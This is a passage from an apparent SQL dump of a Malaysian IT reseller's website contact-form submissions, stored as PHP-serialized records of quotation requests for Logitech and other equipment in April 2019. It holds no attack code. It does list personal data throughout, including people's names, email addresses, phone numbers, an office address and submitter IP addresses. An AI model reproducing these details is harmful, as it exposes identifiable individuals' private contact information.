65t\";}i:7;a:7:{s:2:\"id\";s:3:\"132\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:3:\"125\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:3:\"127\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:3:\"125\";s:5:\"value\";s:2:\"23\";}i:10;a:7:{s:2:\"id\";s:3:\"128\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:3:\"125\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Jabra)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-04-21 08:29:09','175.138.54.221','1'),(159,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"Shalizan Binti Shafii\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"craglobal1@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0193805374\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"CRA Global\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:92:\"15-3 &amp; 17-3, Jalan Maju Ria 2, Plaza Wangsa Maju, Block B, Seksyen 10 53300 Kuala Lumpur\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:30:\"Logitech Group, Logitech Rally\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:44:\"Please send us quatition as soon as possible\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-04-22 10:09:26','175.142.248.215','1'),(160,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:3:\"jai\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"skaladc.it@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0172544879\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:5:\"Skala\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:93:\"we&#039;re using synology for back up and ready for cloud now.need an advice and assistant.tq\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-04-22 11:21:39','115.164.83.21','1'),(161,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:9:\"Tom Felix\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"tom.felix1@veolia.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0192896860\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:6:\"Veolia\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:132:\"To whom this concerns, I would like to know if you sell Zebra printer ZT400 series (fo you have it in stock, what is the quotation?)\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-04-22 12:03:55','203.121.77.110','1'),(162,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:3:\"Tan\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"cl.tan@fgvholdings.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0193104231\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"FGV Holdings Bhd.\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:84:\"To enquire budgetary proposal for document digital signature for Corporate Secretray\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-04-24 13:43:17','183.171.110.219','1'),(163,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:3:\"Tan\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"cl.tan@fgvholdings.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0193104231\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"FGV Holdings Bhd.\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:84:\"To enquire budgetary proposal for document digital signature for Corporate Secretray\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-04-24 13:43:20','183.171.110.219','1'),(164,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:7:\"Jeffrey\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"jeffysc@jdmolecule.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0122018949\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"JD Molecule Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:74:\"Please have your sales to contact me regarding Logitech video conferencing\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-04-26 16:57:32','175.139.211.14','1'),(165,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"Goh Jing Ming\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:27:\"goh.jing.ming@simedarby.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0380647642\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:29:\"Sime Darby Industrial Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:48:\"Logitech Rally, Other (Please specify the model)\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"6 additional Rally Mic Pod\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-04-29 17:12:12','1.9.14.35','1'),(166,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"Goh Jing Ming\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:27:\"goh.jing.ming@simedarby.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0380647642\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:29:\"Sime Darby Industrial Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:48:\"Logitech Rally, Other (Please specify the model)\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"6 additional Rally Mic Pod\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-04-29 17:12:46','1.9.14.35','1'),(167,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation 